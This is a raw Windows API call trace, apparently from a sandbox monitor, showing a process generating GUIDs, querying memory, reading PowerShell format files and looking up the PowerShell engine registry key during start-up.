	[0143.331] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0x9cd44d44, Data2=0x8fe6, Data3=0x4046, Data4=([0]=0xa8, [1]=0x4b, [2]=0xd4, [3]=0xd1, [4]=0xf, [5]=0xe4, [6]=0xc9, [7]=0x12))) returned 0x0
	[0143.332] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0x9ac4a049, Data2=0xd646, Data3=0x4f6b, Data4=([0]=0xac, [1]=0x5f, [2]=0x25, [3]=0x1, [4]=0x6, [5]=0x6b, [6]=0x31, [7]=0xc))) returned 0x0
	[0143.333] VirtualQuery (in: lpAddress=0x1cbc60, lpBuffer=0x1ccb20, dwLength=0x30 | out: lpBuffer=0x1ccb20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0143.334] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0xe476dbfc, Data2=0x6e54, Data3=0x4403, Data4=([0]=0x96, [1]=0x47, [2]=0x4e, [3]=0x5d, [4]=0xd0, [5]=0x74, [6]=0x30, [7]=0x14))) returned 0x0
	[0143.334] VirtualQuery (in: lpAddress=0x1cbc60, lpBuffer=0x1ccb20, dwLength=0x30 | out: lpBuffer=0x1ccb20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.336] VirtualQuery (in: lpAddress=0x1cbc60, lpBuffer=0x1ccb20, dwLength=0x30 | out: lpBuffer=0x1ccb20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.337] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0x1704a314, Data2=0x3ff4, Data3=0x49af, Data4=([0]=0x94, [1]=0xea, [2]=0x8c, [3]=0xae, [4]=0x23, [5]=0x8c, [6]=0xb9, [7]=0x76))) returned 0x0
	[0143.337] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0xb225d6fb, Data2=0xf1fc, Data3=0x4313, Data4=([0]=0xb0, [1]=0x6a, [2]=0x46, [3]=0xbb, [4]=0x18, [5]=0x86, [6]=0xf, [7]=0x3d))) returned 0x0
	[0143.337] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0x9990aa61, Data2=0x292f, Data3=0x4e7c, Data4=([0]=0x80, [1]=0x66, [2]=0x8, [3]=0x1e, [4]=0x7, [5]=0x80, [6]=0xf3, [7]=0xb5))) returned 0x0
	[0143.337] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0xbf3c475d, Data2=0xd756, Data3=0x4653, Data4=([0]=0x80, [1]=0x3d, [2]=0xb0, [3]=0x64, [4]=0x83, [5]=0x75, [6]=0x4d, [7]=0x13))) returned 0x0
	[0143.338] VirtualQuery (in: lpAddress=0x1cbc60, lpBuffer=0x1ccb20, dwLength=0x30 | out: lpBuffer=0x1ccb20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.338] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0x42edabe5, Data2=0x77d, Data3=0x46ec, Data4=([0]=0xab, [1]=0x9c, [2]=0xe, [3]=0x76, [4]=0xee, [5]=0x81, [6]=0x7b, [7]=0xac))) returned 0x0
	[0143.338] VirtualQuery (in: lpAddress=0x1cbc60, lpBuffer=0x1ccb20, dwLength=0x30 | out: lpBuffer=0x1ccb20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.338] VirtualQuery (in: lpAddress=0x1cbc60, lpBuffer=0x1ccb20, dwLength=0x30 | out: lpBuffer=0x1ccb20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.339] VirtualQuery (in: lpAddress=0x1cbc60, lpBuffer=0x1ccb20, dwLength=0x30 | out: lpBuffer=0x1ccb20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.339] VirtualQuery (in: lpAddress=0x1cbc60, lpBuffer=0x1ccb20, dwLength=0x30 | out: lpBuffer=0x1ccb20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.339] VirtualQuery (in: lpAddress=0x1cbc60, lpBuffer=0x1ccb20, dwLength=0x30 | out: lpBuffer=0x1ccb20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.339] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0x3becd417, Data2=0xac22, Data3=0x42d5, Data4=([0]=0xb9, [1]=0xea, [2]=0x64, [3]=0xa0, [4]=0x90, [5]=0x4c, [6]=0x3c, [7]=0x82))) returned 0x0
	[0143.339] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0x415f62b6, Data2=0xdad7, Data3=0x4383, Data4=([0]=0xb0, [1]=0x43, [2]=0xa0, [3]=0xc0, [4]=0x56, [5]=0x53, [6]=0xce, [7]=0x1c))) returned 0x0
	[0143.340] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0x54a355c5, Data2=0x6b3e, Data3=0x447b, Data4=([0]=0xaf, [1]=0xd2, [2]=0x56, [3]=0x2b, [4]=0x5, [5]=0x6e, [6]=0xd9, [7]=0x55))) returned 0x0
	[0143.340] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0x80f2aa70, Data2=0xf973, Data3=0x49ef, Data4=([0]=0x99, [1]=0x10, [2]=0x2e, [3]=0x2b, [4]=0x19, [5]=0xc4, [6]=0x3c, [7]=0x9e))) returned 0x0
	[0143.340] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0xb12a839b, Data2=0xfc7, Data3=0x444c, Data4=([0]=0xbf, [1]=0x18, [2]=0x36, [3]=0xc, [4]=0xb5, [5]=0xc, [6]=0x2d, [7]=0x94))) returned 0x0
	[0143.340] VirtualQuery (in: lpAddress=0x1cbf20, lpBuffer=0x1ccde0, dwLength=0x30 | out: lpBuffer=0x1ccde0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.341] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0x56bc6111, Data2=0xb42, Data3=0x4b5f, Data4=([0]=0xb4, [1]=0xf1, [2]=0xaa, [3]=0xdc, [4]=0xda, [5]=0xcf, [6]=0x9a, [7]=0x97))) returned 0x0
	[0143.341] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0x2e37aac2, Data2=0x456, Data3=0x4e00, Data4=([0]=0xbf, [1]=0x3a, [2]=0x7, [3]=0xdf, [4]=0xef, [5]=0x25, [6]=0x6b, [7]=0x89))) returned 0x0
	[0143.341] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0x865172df, Data2=0xac06, Data3=0x4beb, Data4=([0]=0xb5, [1]=0xa, [2]=0x27, [3]=0x76, [4]=0xe7, [5]=0x4c, [6]=0xdd, [7]=0x43))) returned 0x0
	[0143.342] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0x705421f5, Data2=0x588c, Data3=0x433d, Data4=([0]=0xa0, [1]=0x36, [2]=0xbf, [3]=0xb7, [4]=0xc4, [5]=0xe9, [6]=0x38, [7]=0xa0))) returned 0x0
	[0143.342] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0xc5fd2d71, Data2=0x574d, Data3=0x4b1c, Data4=([0]=0xb3, [1]=0x7b, [2]=0x11, [3]=0x4f, [4]=0x90, [5]=0xb4, [6]=0x6c, [7]=0xbd))) returned 0x0
	[0143.342] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0xf2b4ff69, Data2=0xaeb9, Data3=0x4027, Data4=([0]=0x86, [1]=0x26, [2]=0x1e, [3]=0x19, [4]=0x5b, [5]=0x37, [6]=0xe8, [7]=0xaf))) returned 0x0
	[0143.342] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0xc8f5d9bf, Data2=0x2767, Data3=0x4e96, Data4=([0]=0xb1, [1]=0x11, [2]=0xbb, [3]=0xae, [4]=0x8, [5]=0xca, [6]=0xd9, [7]=0xe1))) returned 0x0
	[0143.342] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0xede79d73, Data2=0xc211, Data3=0x45c3, Data4=([0]=0xac, [1]=0x92, [2]=0x84, [3]=0x57, [4]=0x40, [5]=0xcc, [6]=0x54, [7]=0x7f))) returned 0x0
	[0143.343] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0xe06c24eb, Data2=0xefe5, Data3=0x4244, Data4=([0]=0xa8, [1]=0xb, [2]=0xca, [3]=0x14, [4]=0xd9, [5]=0xfb, [6]=0x7b, [7]=0x82))) returned 0x0
	[0143.343] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0x3745f222, Data2=0x451f, Data3=0x4067, Data4=([0]=0x8f, [1]=0xb, [2]=0x26, [3]=0xc0, [4]=0xcf, [5]=0x19, [6]=0xc6, [7]=0x35))) returned 0x0
	[0143.343] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0xc217184f, Data2=0xb9f4, Data3=0x4115, Data4=([0]=0x8d, [1]=0x81, [2]=0xa5, [3]=0x70, [4]=0xfd, [5]=0xfd, [6]=0xca, [7]=0x19))) returned 0x0
	[0143.343] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0xa00ab7b0, Data2=0x8bdf, Data3=0x4efd, Data4=([0]=0x99, [1]=0x16, [2]=0x11, [3]=0x57, [4]=0x9f, [5]=0xee, [6]=0x66, [7]=0x5))) returned 0x0
	[0143.344] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0x71635cfe, Data2=0xef5a, Data3=0x44ca, Data4=([0]=0xbf, [1]=0x22, [2]=0xf, [3]=0x62, [4]=0x55, [5]=0x7, [6]=0x76, [7]=0x2b))) returned 0x0
	[0143.344] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0xc09859cf, Data2=0xa6cf, Data3=0x4742, Data4=([0]=0x82, [1]=0x3, [2]=0x3c, [3]=0xf8, [4]=0xea, [5]=0xbe, [6]=0x19, [7]=0xd4))) returned 0x0
	[0143.344] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0xef68e06d, Data2=0xffa3, Data3=0x47fc, Data4=([0]=0xb6, [1]=0xc8, [2]=0x6f, [3]=0x1c, [4]=0x46, [5]=0xaa, [6]=0x67, [7]=0x90))) returned 0x0
	[0143.344] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0x4be478a5, Data2=0xb451, Data3=0x4f1d, Data4=([0]=0xa0, [1]=0xe8, [2]=0xb6, [3]=0x35, [4]=0x8a, [5]=0x50, [6]=0xa2, [7]=0x85))) returned 0x0
	[0143.345] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0x363800b3, Data2=0xfeda, Data3=0x4c07, Data4=([0]=0xba, [1]=0x37, [2]=0x9c, [3]=0xfa, [4]=0x1e, [5]=0xa8, [6]=0x6a, [7]=0xa5))) returned 0x0
	[0143.345] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0x5ed8e98b, Data2=0xd933, Data3=0x45bb, Data4=([0]=0x87, [1]=0xf5, [2]=0x17, [3]=0x28, [4]=0xad, [5]=0xc2, [6]=0xf4, [7]=0xef))) returned 0x0
	[0143.345] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0xbd46bb8d, Data2=0x9abc, Data3=0x4004, Data4=([0]=0x9b, [1]=0xf8, [2]=0x44, [3]=0xf, [4]=0x69, [5]=0xe0, [6]=0x3, [7]=0x12))) returned 0x0
	[0143.345] VirtualQuery (in: lpAddress=0x1cbc60, lpBuffer=0x1ccb20, dwLength=0x30 | out: lpBuffer=0x1ccb20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.345] VirtualQuery (in: lpAddress=0x1cbc60, lpBuffer=0x1ccb20, dwLength=0x30 | out: lpBuffer=0x1ccb20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.346] VirtualQuery (in: lpAddress=0x1cbc60, lpBuffer=0x1ccb20, dwLength=0x30 | out: lpBuffer=0x1ccb20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.347] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0x68004cd0, Data2=0xe19e, Data3=0x46e4, Data4=([0]=0xb7, [1]=0x46, [2]=0xf, [3]=0x3d, [4]=0x7c, [5]=0xb4, [6]=0x70, [7]=0xf5))) returned 0x0
	[0143.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0143.348] SetErrorMode (uMode=0x1) returned 0x1
	[0143.348] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x31c
	[0143.349] GetFileType (hFile=0x31c) returned 0x1
	[0143.349] SetErrorMode (uMode=0x1) returned 0x1
	[0143.349] GetFileType (hFile=0x31c) returned 0x1
	[0143.349] ReadFile (in: hFile=0x31c, lpBuffer=0x35662a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35662a0*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.351] ReadFile (in: hFile=0x31c, lpBuffer=0x35662a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35662a0*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.351] ReadFile (in: hFile=0x31c, lpBuffer=0x35662a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35662a0*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.351] ReadFile (in: hFile=0x31c, lpBuffer=0x35662a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35662a0*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.352] ReadFile (in: hFile=0x31c, lpBuffer=0x35662a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35662a0*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.352] ReadFile (in: hFile=0x31c, lpBuffer=0x35662a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35662a0*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.353] ReadFile (in: hFile=0x31c, lpBuffer=0x35662a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35662a0*, lpNumberOfBytesRead=0x1ccff8*=0x119, lpOverlapped=0x0) returned 1
	[0143.353] ReadFile (in: hFile=0x31c, lpBuffer=0x35662a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35662a0*, lpNumberOfBytesRead=0x1ccff8*=0x0, lpOverlapped=0x0) returned 1
	[0143.353] CloseHandle (hObject=0x31c) returned 1
	[0143.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0143.353] SetErrorMode (uMode=0x1) returned 0x1
	[0143.353] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ccfa0 | out: lpFileInformation=0x1ccfa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0143.353] SetErrorMode (uMode=0x1) returned 0x1
	[0143.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0143.353] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd088 | out: phkResult=0x1cd088*=0x31c) returned 0x0
	[0143.354] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd00c, lpData=0x0, lpcbData=0x1cd008*=0x0 | out: lpType=0x1cd00c*=0x1, lpData=0x0, lpcbData=0x1cd008*=0x56) returned 0x0
	[0143.354] CoTaskMemAlloc (cb=0x5a) returned 0x2ed640
	[0143.354] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ccfdc, lpData=0x2ed640, lpcbData=0x1ccfd8*=0x56 | out: lpType=0x1ccfdc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ccfd8*=0x56) returned 0x0
	[0143.354] CoTaskMemFree (pv=0x2ed640) 
	[0143.354] RegCloseKey (hKey=0x31c) returned 0x0
	[0143.354] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0143.354] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0143.356] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.356] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.356] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.357] VirtualQuery (in: lpAddress=0x1cbb20, lpBuffer=0x1cc9e0, dwLength=0x30 | out: lpBuffer=0x1cc9e0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.358] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0x8f009dc3, Data2=0x7387, Data3=0x46b0, Data4=([0]=0x96, [1]=0x14, [2]=0xa0, [3]=0x74, [4]=0x22, [5]=0xba, [6]=0x82, [7]=0xa8))) returned 0x0
	[0143.359] VirtualQuery (in: lpAddress=0x1cbc60, lpBuffer=0x1ccb20, dwLength=0x30 | out: lpBuffer=0x1ccb20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.361] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0x5a9c1c0, Data2=0x88ca, Data3=0x4abf, Data4=([0]=0xa9, [1]=0x33, [2]=0xbb, [3]=0x65, [4]=0x8, [5]=0x10, [6]=0x72, [7]=0xd8))) returned 0x0
	[0143.362] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0x45b9e096, Data2=0x53e, Data3=0x4bdc, Data4=([0]=0x91, [1]=0x5b, [2]=0x63, [3]=0x5, [4]=0x91, [5]=0x32, [6]=0x6f, [7]=0xbc))) returned 0x0
	[0143.363] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0xd0d1cea6, Data2=0xa422, Data3=0x43e0, Data4=([0]=0xb7, [1]=0x45, [2]=0xe6, [3]=0x23, [4]=0x80, [5]=0x17, [6]=0x89, [7]=0x5d))) returned 0x0
	[0143.364] VirtualQuery (in: lpAddress=0x1cbc60, lpBuffer=0x1ccb20, dwLength=0x30 | out: lpBuffer=0x1ccb20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.364] VirtualQuery (in: lpAddress=0x1cbc60, lpBuffer=0x1ccb20, dwLength=0x30 | out: lpBuffer=0x1ccb20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.474] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0143.474] SetErrorMode (uMode=0x1) returned 0x1
	[0143.474] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x31c
	[0143.475] GetFileType (hFile=0x31c) returned 0x1
	[0143.475] SetErrorMode (uMode=0x1) returned 0x1
	[0143.475] GetFileType (hFile=0x31c) returned 0x1
	[0143.475] ReadFile (in: hFile=0x31c, lpBuffer=0x35c2440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35c2440*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.476] ReadFile (in: hFile=0x31c, lpBuffer=0x35c2440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35c2440*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.477] ReadFile (in: hFile=0x31c, lpBuffer=0x35c2440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35c2440*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.477] ReadFile (in: hFile=0x31c, lpBuffer=0x35c2440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35c2440*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.478] ReadFile (in: hFile=0x31c, lpBuffer=0x35c2440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35c2440*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.478] ReadFile (in: hFile=0x31c, lpBuffer=0x35c2440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35c2440*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.479] ReadFile (in: hFile=0x31c, lpBuffer=0x35c2440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35c2440*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.479] ReadFile (in: hFile=0x31c, lpBuffer=0x35c2440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35c2440*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.480] ReadFile (in: hFile=0x31c, lpBuffer=0x35c2440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35c2440*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.481] ReadFile (in: hFile=0x31c, lpBuffer=0x35c2440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x35c2440*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
